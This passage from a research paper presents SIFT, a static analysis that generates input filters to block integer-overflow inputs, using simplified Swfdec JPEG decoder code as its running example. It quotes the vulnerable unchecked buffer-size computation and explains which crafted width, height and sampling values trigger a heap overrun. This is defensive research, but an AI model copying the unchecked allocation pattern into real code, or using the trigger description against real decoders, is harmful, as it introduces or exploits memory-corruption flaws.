15     /* dec->components[i].h_sample =
16        SIFT_input("h_sample", 4); */
17     dec->components[i].v_sample = getbits(bits, 4);
18     /* dec->components[i].v_sample =
19        SIFT_input("v_sample", 4); */
20   }
21 }
22 void jpeg_decoder_init_decoder(JpegDecoder *dec) {
23   int max_h_sample = 0;
24   int max_v_sample = 0;
25   int i;
26   for (i = 0; i < dec->n_components; i++) {
27     max_h_sample = MAX(max_h_sample,
28                        dec->components[i].h_sample);
29     max_v_sample = MAX(max_v_sample,
30                        dec->components[i].v_sample);
31   }
32   dec->width_blocks = (dec->width + 8*max_h_sample - 1)
33                       / (8*max_h_sample);
34   dec->height_blocks = (dec->height + 8*max_v_sample - 1)
35                        / (8*max_v_sample);
36   for (i = 0; i < dec->n_components; i++) {
37     int rowstride;
38     int image_size;
39     dec->components[i].h_subsample = max_h_sample /
40                                      dec->components[i].h_sample;
41     dec->components[i].v_subsample = max_v_sample /
42                                      dec->components[i].v_sample;
43     rowstride = dec->width_blocks * 8 * max_h_sample /
44                 dec->components[i].h_subsample;
45     image_size = rowstride * (dec->height_blocks * 8 *
46                  max_v_sample / dec->components[i].v_subsample);
47     dec->components[i].image = malloc(image_size);
48   }
49 }

Figure 2. Simplified Swfdec source code. Input statement annotations appear in comments.

When Swfdec opens an SWF file with embedded JPEG images, it calls jpeg_decoder_decode() (line 1 in Figure 2) to decode each JPEG image in the file. This function in turn calls the function jpeg_decoder_start_of_frame() (line 7) to read the image metadata and the function
jpeg_decoder_init_decoder() (line 22) to allocate memory buffers for the JPEG image.

There is an integer overflow vulnerability at lines 43-47, where Swfdec calculates the size of the buffer for a JPEG image as:

rowstride * (dec->height_blocks * 8 * max_v_sample / dec->components[i].v_subsample)

At this program point, rowstride equals:

(jpeg_width + 8*max_h_sample - 1) / (8*max_h_sample) * 8*max_h_sample / (max_h_sample / h_sample)

while the rest of the expression equals:

(jpeg_height + 8*max_v_sample - 1) / (8*max_v_sample) * 8*max_v_sample / (max_v_sample / v_sample)

where jpeg_height is the 16-bit height input field value that Swfdec reads at line 9 and jpeg_width is the 16-bit width input field value that Swfdec reads at line 11. h_sample is one of the horizontal sampling factor values that Swfdec reads at line 14, while max_h_sample is the maximum horizontal sampling factor value. v_sample is one of the vertical sampling factor values that Swfdec reads at line 17, while max_v_sample is the maximum vertical sampling factor value. Malicious inputs with specifically crafted values in these input fields can cause the image buffer size calculation to overflow. In this case Swfdec allocates an image buffer that is smaller than required and eventually writes beyond the end of the allocated buffer.

The loop at lines 13-20 reads an array of horizontal and vertical sampling factor values. Swfdec computes the maximum values of these factors in the loop at lines 26-31. It then uses these values to compute the size of the allocated buffer at each iteration of the loop at lines 36-48.

Analysis Challenges: This example highlights several challenges that SIFT must overcome to successfully analyze and generate a filter for this program. First, the expression for the size of the buffer uses pointers to access values derived from input fields. To overcome this challenge, SIFT uses an alias analysis [17] to reason precisely about expressions with pointers.
Second, the memory allocation site (line 47) occurs in a loop, with the size expression referencing input values read in a different loop (lines 13-20). Different instances of the same input field (h_sample and v_sample) are used to compute (potentially different) sizes for different blocks of memory allocated at the same site. To reason precisely about these different instances, the analysis works with an abstraction that materializes, on demand, abstract representatives of accessed input field and computed values (see Section 3). To successfully analyze the loop, the analysis uses a new loop invariant synthesis algorithm (which exploits a new expression normalization technique to reach a fixed point).

Finally, Swfdec reads the input fields (lines 14 and 17) and computes the size of the allocated memory block (lines 45-46) in different procedures. SIFT therefore uses an interprocedural analysis that propagates symbolic conditions across procedure boundaries to obtain precise symbolic conditions.

We next describe how SIFT generates a sound input filter to nullify this integer overflow error.

Source Code Annotations: SIFT provides a declarative specification interface that enables the developer to specify which statements read which input fields. In this example, the developer specifies that the application reads the input fields jpeg_height, jpeg_width, h_sample, and v_sample at lines 10, 12, 15-16, and 18-19 in Figure 2.
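The overflow described above can be reproduced in isolation. The sketch below is our own simplification, not SIFT code: it fixes all sampling factors to 1, so the size computation reduces to rounding each dimension up to a multiple of 8 and multiplying. A 65535×65535 image (the maximum 16-bit field values) then drives the product to exactly 2^32, past what a 32-bit int can hold. We use the GCC/Clang intrinsic __builtin_mul_overflow to observe the overflow without invoking undefined behavior:

```c
#include <stdbool.h>
#include <stdint.h>

/* Simplified Swfdec size computation with all sampling factors fixed to 1
   (our simplification): width_blocks = ceil(width/8), rowstride = 8*blocks.
   Returns true if the 32-bit image_size computation would overflow. */
static bool image_size_overflows(int32_t width, int32_t height) {
    int32_t width_blocks  = (width  + 8 - 1) / 8;
    int32_t height_blocks = (height + 8 - 1) / 8;
    int32_t rowstride = width_blocks * 8;   /* at most 65536: still fits */
    int32_t colstride = height_blocks * 8;
    int32_t image_size;
    /* 65536 * 65536 == 2^32 does not fit in int32_t: the unchecked
       original code would pass a wrapped (too small) size to malloc. */
    return __builtin_mul_overflow(rowstride, colstride, &image_size);
}
```

With width = height = 65535 both strides are 65536 and the final multiplication overflows; a benign 100×100 image does not.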
SIFT uses this specification to map the variables dec->height, dec->width, dec->components[i].h_sample, and dec->components[i].v_sample at lines 9, 11, 14, and 17 to the corresponding input field values. The field names h_sample and v_sample map to two arrays of input fields that Swfdec reads in the loop at lines 14 and 17.

C: safe(
  (((sext(jpeg_width[16], 32) + 8[32] × sext(h_sample(1)[4], 32) − 1[32])
      / (8[32] × sext(h_sample(1)[4], 32)) × 8[32] × sext(h_sample(1)[4], 32))
    / (sext(h_sample(1)[4], 32) / sext(h_sample(2)[4], 32)))
  ×
  (((sext(jpeg_height[16], 32) + 8[32] × sext(v_sample(1)[4], 32) − 1[32])
      / (8[32] × sext(v_sample(1)[4], 32)) × 8[32] × sext(v_sample(1)[4], 32))
    / (sext(v_sample(1)[4], 32) / sext(v_sample(2)[4], 32))))

Figure 3. The symbolic condition C for the Swfdec example. Subexpressions in C are bit vector expressions. The bracketed superscript indicates the bit width of each expression atom. "sext(v, w)" is the signed extension operation that transforms the value v to the bit width w.

Compute Symbolic Condition: SIFT uses a demand-driven, interprocedural, backward static analysis to compute the symbolic condition C in Figure 3. We use the notation "safe(e)" in Figure 3 to denote that overflow errors should not occur in any step of the evaluation of the expression e. Subexpressions in C are in bit vector expression form so that the expressions accurately reflect the representation of the numbers inside the computer as fixed-length bit vectors, as well as the semantics of arithmetic and logical operations as implemented inside the computer on these bit vectors. In Figure 3, the bracketed superscripts indicate the bit width of each expression atom. sext(v, w) is the signed extension operation that transforms the value v to the bit width w. SIFT also tracks the sign of each arithmetic operation in C. For simplicity, Figure 3 omits this information. SIFT soundly handles the loops that access the input field arrays h_sample and v_sample.
The generated C reflects the fact that the variable dec->components[i].h_sample and the variable max_h_sample might be two different elements of the input array h_sample. In C, h_sample(1) corresponds to max_h_sample and h_sample(2) corresponds to dec->components[i].h_sample. SIFT handles v_sample similarly. C includes all intermediate expressions evaluated at lines 32-35 and 39-46.

In this example, C contains only a single term of the form safe(e). However, if there are multiple execution paths, SIFT generates a symbolic condition C that conjoins multiple terms of the form safe(e) to cover all paths.

Generate Input Filter: Starting with the symbolic condition C, SIFT generates an input filter that discards any input that violates C, i.e., any input for which, for some term safe(e) in C, the evaluation of e (including all subexpressions) triggers an integer overflow error. The generated filter extracts all instances of the input fields jpeg_height, jpeg_width, h_sample, and v_sample (these are the input fields that appear in C) from an incoming input. It then iterates over all combinations of pairs of the input fields h_sample and v_sample to consider all possible bindings of h_sample(1), h_sample(2), v_sample(1), and v_sample(2) in C. For each binding, it checks the entire evaluation of C (including the evaluation of all subexpressions) for overflow. If there is no overflow in any evaluation, the filter accepts the input; otherwise it rejects the input.

3. Static Analysis

This section presents the static analysis algorithm in SIFT. We have implemented our static analysis for C programs using the LLVM Compiler Infrastructure [2].

3.1 Core Language and Notation

s := l: x = read(f) | l: x = c | l: x = y |
     l: x = y op z | l: x = *p | l: *p = x |
     l: p = malloc | l: skip | s′; s′′ |
     l: if (x) s′ else s′′ | l: while (x) {s′}

s, s′, s′′ ∈ Statement    f ∈ InputField
x, y, z, p ∈ Var    c ∈ Int    l ∈ Label

Figure 4. The Core Programming Language

Figure 4 presents the core language that we use to present the analysis.
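As a preview of how the backward analysis of Section 3.2 operates over this language, consider a toy fragment (ours, not from Swfdec) that reads two fields, multiplies them, and reaches an allocation. Starting from safe of the critical variable and walking backwards, each statement substitutes into the condition:

```
l1: w = read(jpeg_width)     -- reads an input field
l2: h = read(jpeg_height)
l3: t = w op h               -- op = ×; t is the critical value
l4: p = malloc               -- critical site: start from safe(t)

Backward from l4 with C = safe(t):
  at l3 (x = y op z):  safe(t)[w × h / t]           = safe(w × h)
  at l2 (read):        safe(w × h)[jpeg_height(1)/h] = safe(w × jpeg_height(1))
  at l1 (read):        safe(jpeg_width(1) × jpeg_height(1))
```

The final condition mentions only input fields and constants, which is exactly the form a filter can evaluate against a concrete input.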
The language is modeled on a standard lowered program representation in which 1) nested expressions are converted into sequences of statements of the form l: x = y op z (where x, y, and z are either non-aliased variables or automatically generated temporaries) and 2) all accesses to potentially aliased memory locations occur in load or store statements of the form l: x = *p or l: *p = x. Each statement contains a unique label l ∈ Label.

A statement of the form "l: x = read(f)" reads a value from an input field f. Because the input may contain multiple instances of the field f, different executions of the statement may return different values. For example, the loop at lines 14-17 in Figure 2 reads multiple instances of the h_sample and v_sample input fields.

Labels and Pointer Analysis: Figure 5 presents three utility functions in our notation: first: Statement → Label, last: Statement → Label, and labels: Statement → P(Label). Intuitively, given a statement s, first maps s to the label that corresponds to the first atomic statement inside s; last maps s to the label that corresponds to the last atomic statement inside s; labels maps s to the set of labels that are inside s.

first(s) = { first(s′)   if s = s′; s′′
           { l           otherwise, where l is the label of s

last(s) = { last(s′′)    if s = s′; s′′
          { l            otherwise, where l is the label of s

labels(s) = { labels(s′) ∪ labels(s′′)         if s = s′; s′′
            { {l} ∪ labels(s′)                 if s = l: while (x) {s′}
            { {l} ∪ labels(s′) ∪ labels(s′′)   if s = l: if (x) s′ else s′′
            { {l}                              otherwise, where l is the label of s

Figure 5. Definitions of first, last, and labels

We use LoadLabel and StoreLabel to denote the sets of labels that correspond to load and store statements, respectively; LoadLabel ⊆ Label and StoreLabel ⊆ Label. Our static analysis uses an underlying pointer analysis [17] to disambiguate aliases at load and store statements.
The pointer analysis provides two functions, no_alias and must_alias:

no_alias: (StoreLabel × LoadLabel) → Bool
must_alias: (StoreLabel × LoadLabel) → Bool

We assume that the underlying pointer analysis is sound, so that 1) no_alias(lstore, lload) = true only if the load statement at label lload will never retrieve a value stored by the store statement at label lstore; and 2) must_alias(lstore, lload) = true only if the load statement at label lload will always retrieve a value from the last memory location that the store statement at label lstore manipulates (see Section 4.2 for a formal definition of the soundness requirements that the alias analysis must satisfy).

3.2 Intraprocedural Analysis

Because it works with a lowered representation, our static analysis starts with a variable v at a critical program point. It then propagates v backward against the control flow to the program entry point. In this way the analysis computes a symbolic condition that soundly captures how the program, starting with input field values, may compute the value of v at the critical program point. The generated filters use the analysis results to check whether the input may trigger an integer overflow error in any of these computations.

Condition Syntax: Figure 7 presents the definition of the symbolic conditions that our analysis manipulates and propagates. A condition consists of a set of conjuncts of the form safe(e), which represents that the evaluation of the symbolic expression e should not trigger an overflow condition (including all sub-computations in the evaluation; see Section 4.5 for the formal definition of a program state satisfying a condition).

C := C ∧ safe(e) | safe(e)
e := e1 op e2 | atom
atom := x | c | f(id) | l(id)

id ∈ {1, 2, . . . }    x ∈ Var    c ∈ Int
l ∈ LoadLabel    f ∈ InputField

Figure 7.
The Condition Syntax

Symbolic conditions may contain four kinds of atoms: c represents a constant, x represents the variable x, f(id) represents the value of an input field f (the analysis uses the natural number id to distinguish different instances of f), and l(id) represents a value returned by a load statement with the label l (the analysis uses the natural number id to distinguish values loaded at different executions of the load statement).

Analysis Framework: Given a series of statements s, a label l within s (l ∈ labels(s)), and a symbolic condition C at the program point after the statement with the label l, our demand-driven backwards analysis computes a symbolic condition F(s, l, C). The analysis ensures that if F(s, l, C) holds before executing s, then C will hold whenever the execution reaches the program point after the statement with the label l (see Section 4.5 for the formal definition).

Given a program s0 as a series of statements and a variable v at a critical site associated with the label l, our analysis generates the condition F(s0, l, safe(v)) to create an input filter that checks whether the input may trigger an integer overflow error in the computations that the program performs to obtain the value of v at the critical site.

Analysis of Assignment, Conditional, and Sequence Statements: Figure 6 presents the analysis rules for basic program statements. The analysis of assignment statements replaces the assigned variable x with the assigned value (c, y, y op z, or f(id), depending on the assignment statement). Here the notation C[ea/eb] denotes the new symbolic condition obtained by replacing every occurrence of eb in C with ea. The analysis rule for input read statements materializes a new id to represent the read value f(id). This mechanism enables the analysis to correctly distinguish different instances of the same input field (because different instances have different ids).
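One way to realize this condition language and its "no overflow in any sub-computation" requirement is a small expression tree with a checked evaluator. The types and names below are ours, a sketch rather than SIFT's implementation, and variable and load atoms are omitted for brevity; the point is that the overflow flag accumulates across every sub-computation, mirroring the meaning of safe(e):

```c
#include <stdbool.h>
#include <stdint.h>

/* A cut-down rendering of the atom/expression grammar of Figure 7
   (constants, input fields, and binary operations only; names are ours). */
typedef struct Expr Expr;
struct Expr {
    enum { E_CONST, E_FIELD, E_BINOP } tag;
    int32_t value;           /* E_CONST */
    int field;               /* E_FIELD: index into the field bindings */
    char op;                 /* E_BINOP: '+' or '*' */
    const Expr *lhs, *rhs;   /* E_BINOP operands */
};

/* Evaluate e in 32 bits under concrete field bindings. *of becomes true
   if ANY sub-computation overflows -- exactly what safe(e) must exclude. */
static int32_t eval(const Expr *e, const int32_t *fields, bool *of) {
    if (e->tag == E_CONST) return e->value;
    if (e->tag == E_FIELD) return fields[e->field];
    int32_t a = eval(e->lhs, fields, of);
    int32_t b = eval(e->rhs, fields, of);
    int32_t r = 0;
    if (e->op == '+') *of |= __builtin_add_overflow(a, b, &r);
    else              *of |= __builtin_mul_overflow(a, b, &r);
    return r;
}
```

For example, evaluating safe(f(1) × f(1)) with f(1) bound to 65536 sets the flag, while binding 100 leaves it clear.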
If the label l identifies the end of a conditional statement, the analysis of the statement takes the union of the symbolic conditions from the analysis of the true and false branches of the conditional statement. The resulting symbolic condition correctly takes the execution of both branches into account. If the label l identifies a program point within one of the branches of a conditional statement, the analysis will propagate the condition from that branch only. The analysis of sequences of statements propagates the symbolic condition backwards through the statements in sequence.

Statement s              Rules
l: x = c                 F(s, l, C) = C[c/x]
l: x = y                 F(s, l, C) = C[y/x]
l: x = y op z            F(s, l, C) = C[y op z / x]
l: x = read(f)           F(s, l, C) = C[f(id)/x], f(id) is fresh
s′; s′′                  F(s, l, C) = F(s′, last(s′), F(s′′, l, C)), if l ∈ labels(s′′)
                         F(s, l, C) = F(s′, l, C), if l ∈ labels(s′)
l: if (v) s′ else s′′    F(s, l, C) = F(s′, last(s′), C) ∧ F(s′′, last(s′′), C)
                         F(s, l′, C) = F(s′, l′, C), if l′ ∈ labels(s′)
                         F(s, l′, C) = F(s′′, l′, C), if l′ ∈ labels(s′′)
l: while (v) {s′}        F(s, l, C) = Cfix ∧ C, if norm(F(s′, last(s′), Cfix ∧ C)) = Cfix
                         F(s, l′, C) = F(s, l, C′), if F(s′, l′, C) = C′ and l′ ∈ labels(s′)
l: p = malloc            F(s, l, C) = C
l: x = *p                F(s, l, C) = C[l(id)/x], l(id) is fresh
l: *p = x                F(s, l, C) = C(l1(id1), l, x)(l2(id2), l, x) . . . (ln(idn), l, x)
                         for all l1(id1), . . . , ln(idn) in C, where:
                         C(lload(id), l, x) = C                    if no_alias(l, lload)
                                            = C[x/lload(id)]       if ¬no_alias(l, lload) ∧ must_alias(l, lload)
                                            = C[x/lload(id)] ∧ C   if ¬no_alias(l, lload) ∧ ¬must_alias(l, lload)

Figure 6. Static analysis rules. The notation C[ea/eb] denotes the symbolic condition obtained by replacing every occurrence of eb in C with ea. norm(C) is the normalization function that transforms the condition C to an equivalent normalized condition.

Analysis of Load and Store Statements: The analysis of a load statement x = *p replaces the assigned variable x with a materialized abstract value l(id) that represents the loaded value.
As with input read statements, the analysis uses a newly materialized id to distinguish values read on different executions of the load statement.

The analysis of a store statement *p = x uses the alias analysis to appropriately match the stored value x against all loads that may return that value. Specifically, the analysis locates all li(idi) atoms in C that either may or must load a value that the store statement stores into the location p. If the alias analysis determines that the li(idi) expression must load x (i.e., the corresponding load statement will always access the last value that the store statement stored into location p), then the analysis of the store statement replaces all occurrences of li(idi) with x. If the alias analysis determines that the li(idi) expression may load x (i.e., on some executions the corresponding load statement may load x, on others it may not), then the analysis produces two symbolic conditions: one with li(idi) replaced by x (for executions in which the load statement loads x) and one that leaves li(idi) in place (for executions in which the load statement loads a value other than x).

 1 Input: Expression e
 2 Output: Normalized expression e_norm
 3
 4 e_norm ← e
 5 f_cnt ← {all → 0}
 6 l_cnt ← {all → 0}
 7 for a in Atoms(e) do
 8   if a is in form f(id) then
 9     nextid ← f_cnt(f) + 1
10     f_cnt ← f_cnt[f → nextid]
11     e_norm ← e_norm[*f(nextid) / f(id)]
12   else if a is in form l(id) then
13     nextid ← l_cnt(l) + 1
14     l_cnt ← l_cnt[l → nextid]
15     e_norm ← e_norm[*l(nextid) / l(id)]
16   end if
17 end
18 for a in Atoms(e_norm) do
19   if a is in form *f(id) then
20     e_norm ← e_norm[f(id) / *f(id)]
21   else if a is in form *l(id) then
22     e_norm ← e_norm[l(id) / *l(id)]
23   end if
24 end

Figure 8. Normalization function norm(e). Atoms(e) iterates over the atoms in the expression e from left to right.

We note that, if the pointer analysis is imprecise, the symbolic condition may become intractably large. SIFT uses the DSA algorithm [17], a context-sensitive, unification-based pointer analysis. We found that, in practice, this analysis
is precise enough to enable SIFT to efficiently analyze our benchmark applications (see Figure 14 in Section 5.2).

Analysis of Loop Statements: The analysis uses a fixed-point algorithm to synthesize the loop invariant Cfix required to analyze while loops. Specifically, the analysis of a statement while (x) {s′} computes a sequence of symbolic conditions Ci, where C0 = ∅ and Ci = norm(F(s′, last(s′), C ∧ Ci−1)). Conceptually, each successive symbolic condition Ci captures the effect of executing an additional loop iteration. The analysis terminates when it reaches a fixed point (i.e., when it has performed n iterations such that Cn = Cn−1). Here Cn is the discovered loop invariant. This fixed point correctly summarizes the effect of the loop (regardless of the number of iterations that it may perform).

The loop analysis normalizes the analysis result F(s′, last(s′), C ∧ Ci−1) after each iteration. For a symbolic condition C = safe(e1) ∧ . . . ∧ safe(en), the normalization of C is norm(C) = remove_dup(safe(norm(e1)) ∧ . . . ∧ safe(norm(en))), where norm(ei) is the normalization of each individual expression in C (using the algorithm presented in Figure 8) and remove_dup() removes duplicate conjuncts from the condition.

Normalization facilitates loop invariant discovery for loops that read input fields or load values via pointers. Each analysis of the loop body during the fixed point computation produces new materialized values f(id) and l(id) with fresh ids. The new materialized f(id) represent input fields that the current loop iteration reads; the new materialized l(id) represent values that the current loop iteration loads via pointers. The normalization algorithm appropriately renumbers these ids in the new symbolic condition so that the first appearance of each id is in lexicographic order. Because the normalization only renumbers ids, the normalized condition is equivalent to the original condition (see Section 4.5).
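The renumbering effect of Figure 8 can be reproduced over a flat list of atoms. The sketch below is our own; it assumes at most 16 distinct names and ids, and replaces Figure 8's two passes with '*' markers by an explicit old-to-new id map per name, which yields the same result: ids are renumbered in order of first appearance, left to right:

```c
/* An atom of a condition: kind 'f' (input field) or 'l' (load label),
   name identifying the field/label, id the instance number. */
typedef struct { char kind; int name; int id; } Atom;

/* Renumber instance ids in order of first appearance (sketch; fixed-size
   tables stand in for Figure 8's two passes with '*' markers). */
static void normalize(Atom *atoms, int n) {
    int map_f[16][16] = {{0}}, map_l[16][16] = {{0}}; /* old id -> new id */
    int cnt_f[16] = {0}, cnt_l[16] = {0};             /* ids used per name */
    for (int i = 0; i < n; i++) {
        int (*map)[16] = atoms[i].kind == 'f' ? map_f : map_l;
        int *cnt       = atoms[i].kind == 'f' ? cnt_f : cnt_l;
        int *slot = &map[atoms[i].name][atoms[i].id];
        if (*slot == 0)                    /* first time we meet this id */
            *slot = ++cnt[atoms[i].name];
        atoms[i].id = *slot;
    }
}
```

Two successive loop-body analyses that differ only in which fresh ids they materialized then normalize to identical conditions, which is how the fixed point is detected.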
This normalization enables the analysis to recognize loop invariants that show up as equivalent successive analysis results that differ only in the materialized ids that they use to represent input fields and values accessed via pointers.

The above algorithm will reach a fixed point and terminate if it computes the symbolic condition of a value that depends on at most a statically fixed number of values from the loop iterations. For example, our algorithm is able to compute the symbolic condition of the size parameter value of the memory allocation in Figure 2 — the value of this size parameter depends only on the values of jpeg_width and jpeg_height, the current values of h_sample and v_sample, and the maximum values of h_sample and v_sample, each of which comes from one previous iteration of the loop at lines 26-31.

Note that the algorithm will not reach a fixed point if it attempts to compute a symbolic condition that contains an unbounded number of values from different loop iterations. For example, the algorithm will not reach a fixed point if it attempts to compute a symbolic condition for the sum of a set of numbers computed within the loop (the sum depends on values from all loop iterations). To ensure termination, our current implementation terminates the analysis

 1 Input: A symbolic condition C
 2 Output: F(lcall: v = call proc v1 . . . vk, lcall, C),
 3   where proc is defined as:
 4   proc(a1, a2, . . . , ak) { s; ret vret }
 5 Where: l1(id1), l2(id2), . . . , ln(idn)
 6   are all atoms of the form l(id)
 7   that appear in S.
 8
 9 R ← ∅
10 ST0 ← F(s, last(s), safe(vret))
11 for e0 in exprs(ST0[v1/a1] . . . [vn/an]) do
12   ST1 ← F(s, last(s), safe(l1(id1)))
13   for e1 in exprs(ST1[v1/a1] . . . [vn/an]) do
14     ...
15     STn ← F(s, last(s), safe(ln(idn)))
16     for en in exprs(STn[v1/a1] . . . [vn/an]) do
17       e′0 ← make_fresh(e0, C)
18       ...
19       e′n ← make_fresh(en, C)
20       R ← R ∧ C[e′0/v] . . . [e′i/li(idi)] . . .
21     end
22     ...
23   end
24 end
25 F(lcall: v = call proc v1 . . .
vk, lcall, C) ← R

Figure 9. Procedure Call Analysis Algorithm. make_fresh(e, C) renumbers ids in e so that occurrences of l(id) and f(id) will not conflict with the condition C. exprs(C) returns the set of expressions that appear in the conjuncts of C. For example, exprs(safe(e1) ∧ safe(e2)) = {e1, e2}.

and fails to generate a symbolic condition C if it fails to reach a fixed point after ten iterations.

In practice, we expect that many programs may contain expressions whose values depend on an unbounded number of values from different loop iterations. Our analysis can successfully analyze such programs because it is demand driven — it only attempts to obtain precise symbolic representations of expressions that may contribute to the values of expressions in the analyzed symbolic condition C (which, in our current system, are ultimately derived from expressions that appear at memory allocation and block copy sites). Our experimental results indicate that our approach is, in practice, effective for this set of expressions, specifically because these expressions tend to depend on at most a fixed number of values from loop iterations.

3.3 Inter-procedural Analysis

Analyzing Procedure Calls: Figure 9 presents the interprocedural analysis for procedure call sites. Given a symbolic condition C and a function call statement lcall: v = call proc v1 . . . vk that invokes a procedure proc(a1, a2, . . . , ak) { s; ret vret }, the analysis computes F(v = call proc v1 . . . vk, lcall, C).

Conceptually, the analysis performs two tasks. First, it replaces any occurrences of the procedure return value v in C (the symbolic condition after the procedure call) with symbolic expressions that represent the values that the procedure may return. Second, it transforms C to reflect the effect of any store instructions that the procedure may execute.
Specifically, the analysis finds expressions l(id) in C that represent values that 1) the procedure may store into a location p and 2) the computation following the procedure may access via a load instruction that may access (a potentially aliased version of) p. It then replaces occurrences of l(id) in C with symbolic expressions that represent the corresponding values computed (and stored into p) within the procedure.

The analysis examines the invoked procedure body s to obtain the symbolic expressions that correspond to the return value (see line 10) or the value of l(id) (see lines 12 and 15). The analysis avoids redundant analysis of the invoked procedure by caching the analysis results F(s, last(s), safe(vret)) and F(s, last(s), safe(l(id))) for reuse.

Note that symbolic expressions derived from an analysis of the invoked procedure may contain occurrences of the formal parameters a1, . . . , ak. The interprocedural analysis translates these symbolic expressions into the name space of the caller by replacing occurrences of the formal parameters a1, . . . , ak with the corresponding actual parameters v1, . . . , vk from the call site (see lines 11, 13, and 16 in Figure 9). Also note that the analysis carefully renumbers the ids in the symbolic expressions derived from an analysis of the invoked procedure before the replacements (see lines 17-19). This ensures that the occurrences of f(id) and l(id) in the expressions are fresh in C.

Propagation to Program Entry: To derive the final symbolic condition at the start of the program, the analysis propagates the current symbolic condition up the call tree through procedure calls until it reaches the start of the program. When the propagation reaches the entry of the current procedure proc, the algorithm uses the procedure call graph to find all call sites that may invoke proc.
It then propagates the current symbolic condition C to the callers of proc, appropriately translating C into the naming context of the caller by substituting any formal parameters of proc that appear in C with the corresponding actual parameters from the call site. The analysis continues this propagation until it has traced out all paths in the call graph from the initial critical site where the analysis started to the program entry point. The final symbolic condition C is the conjunction of the conditions derived along all of these paths.

3.4 Extension to C Programs

We next describe how we extend our analysis to real-world C programs to generate input filters.

Identify Critical Sites: SIFT transforms the application source code into the LLVM intermediate representation (IR) [2], scans the IR to identify critical values (i.e., size parameters of memory allocation and block copy call sites) inside the developer-specified module, and then performs the static analysis for each identified critical value. By default, SIFT recognizes calls to standard C memory allocation routines (such as malloc, calloc, and realloc) and block copy routines (such as memcpy). SIFT can also be configured to recognize additional memory allocation and block copy routines (for example, dMalloc in Dillo).

Bit Width and Signedness: SIFT extends the analysis described above to track the bit width of each expression atom. It also tracks the sign of each expression atom and arithmetic operation and correctly handles extension and truncation operations (i.e., signed extension, unsigned extension, and truncation) that change the width of a bit vector. SIFT therefore faithfully implements the representation of integer values in the C program.

Function Pointers and Library Calls: SIFT uses its underlying pointer analysis [17] to disambiguate function pointers. It can analyze programs that invoke functions via function pointers.
The static analysis may encounter procedure calls (for example, calls to standard C library functions) for which the source code of the callee is not available. A standard way to handle this situation is to work with an annotated procedure declaration that gives the static analysis information that it can use to analyze calls to the procedure. If code for an invoked procedure is not available, by default SIFT currently synthesizes information that indicates that symbolic expressions are not available for the return value or for any values accessible (and therefore potentially stored) via procedure parameters (code following the procedure call may load such values). This information enables the analysis to determine if the return value or values accessible via the procedure parameters may affect the analyzed symbolic condition C. If so, SIFT does not generate a filter. Because SIFT is demand-driven, this mechanism enables SIFT to successfully analyze programs with library calls (all of our benchmark programs have such calls) as long as the calls do not affect the analyzed symbolic conditions.

Annotations for Input Read Statements: SIFT provides a declarative specification language that developers use to indicate which input statements read which input fields. In our current implementation these statements appear in the source code in comments directly below the C statement that reads the input field. See lines 10, 12, 15-16, and 18-19 in Figure 2 for examples that illustrate the use of the specification language in the Swfdec example. The SIFT annotation generator scans the comments, finds the input specification statements, then inserts new nodes into the LLVM IR that contain the specified information. Formally, this information appears as procedure calls of the following form:

v = SIFT_input("field_name", w);

where v is a program variable that holds the value of the input field with the field name field_name.
The width (in bits) of the input field is w. The SIFT static analyzer recognizes such procedure calls as specifying the correspondence between input fields and program variables and applies the appropriate analysis rule for input read statements (see Figure 6).

Input Filter Generation: We prune any conjuncts that contain residual occurrences of abstract materialized values l(id) in the final symbolic condition C. We also replace every residual occurrence of a program variable v with 0. Formally speaking, these residual occurrences correspond to initial values of the program state σ and h̄ in the abstract semantics (see Section 4.3). The resulting condition CInp will contain only input value and constant atoms.

The filter operates as follows. It first uses an existing parser for the input format to parse the input and extract the input fields used in the input condition CInp. Open source parsers are available for a wide range of input file formats, including all of the formats in our experimental evaluation [1]. These parsers provide a standard API that enables clients to access the parsed input fields.

The generated filter evaluates each conjunct expression in CInp by replacing each symbolic input variable in the expression with the corresponding concrete value from the parsed input. If an integer overflow may occur in the evaluation of any expression in CInp, the filter discards the input and optionally raises an alarm. For input field arrays such as h_sample and v_sample in the Swfdec example (see Section 2), the input filter enumerates all possible combinations of concrete values (see Figure 12 for the formal definition of condition evaluation). The filter discards the input if any combination can trigger the integer overflow error.
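For the Swfdec condition of Figure 3, this enumeration can be sketched as follows. The code is our own, not SIFT's generator, and it makes one labeled simplification: bindings with zero or order-inverted sampling factors are skipped to avoid division by zero, since the paper's filters target overflow rather than divide errors. Every arithmetic step is checked, so an overflow anywhere in the evaluation rejects the input:

```c
#include <stdbool.h>
#include <stdint.h>
#include <stddef.h>

/* Checked 32-bit helpers: *of accumulates overflow across all steps. */
static int32_t cadd(int32_t a, int32_t b, bool *of) {
    int32_t r; *of |= __builtin_add_overflow(a, b, &r); return r;
}
static int32_t cmul(int32_t a, int32_t b, bool *of) {
    int32_t r; *of |= __builtin_mul_overflow(a, b, &r); return r;
}

/* Evaluate the Figure 3 condition for one binding of h_sample(1),
   h_sample(2), v_sample(1), v_sample(2); true means some step overflows. */
static bool binding_overflows(int32_t w, int32_t h,
                              int32_t hs1, int32_t hs2,
                              int32_t vs1, int32_t vs2) {
    bool of = false;
    /* Simplification (ours): skip zero/order-inverted factors, which would
       divide by zero; in Swfdec max_h_sample >= h_sample >= 1 holds. */
    if (hs1 <= 0 || hs2 <= 0 || vs1 <= 0 || vs2 <= 0 ||
        hs2 > hs1 || vs2 > vs1)
        return false;
    int32_t wb = cadd(cadd(w, cmul(8, hs1, &of), &of), -1, &of) / (8 * hs1);
    int32_t rs = cmul(cmul(wb, 8, &of), hs1, &of) / (hs1 / hs2);
    int32_t hb = cadd(cadd(h, cmul(8, vs1, &of), &of), -1, &of) / (8 * vs1);
    int32_t cs = cmul(cmul(hb, 8, &of), vs1, &of) / (vs1 / vs2);
    cmul(rs, cs, &of);   /* the image_size product itself */
    return of;
}

/* Accept only if no pair binding drawn from the sampling-factor arrays
   can make any step of the evaluation overflow. */
static bool filter_accepts(int32_t w, int32_t h,
                           const int32_t *hs, const int32_t *vs, size_t n) {
    for (size_t a = 0; a < n; a++) for (size_t b = 0; b < n; b++)
        for (size_t c = 0; c < n; c++) for (size_t d = 0; d < n; d++)
            if (binding_overflows(w, h, hs[a], hs[b], vs[c], vs[d]))
                return false;
    return true;
}
```

A 65535×65535 image with unit sampling factors is rejected (the final product reaches 2^32), while a 100×100 image passes; the cost of the four nested loops is negligible next to reading the input, consistent with the measurements in Section 1.4.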
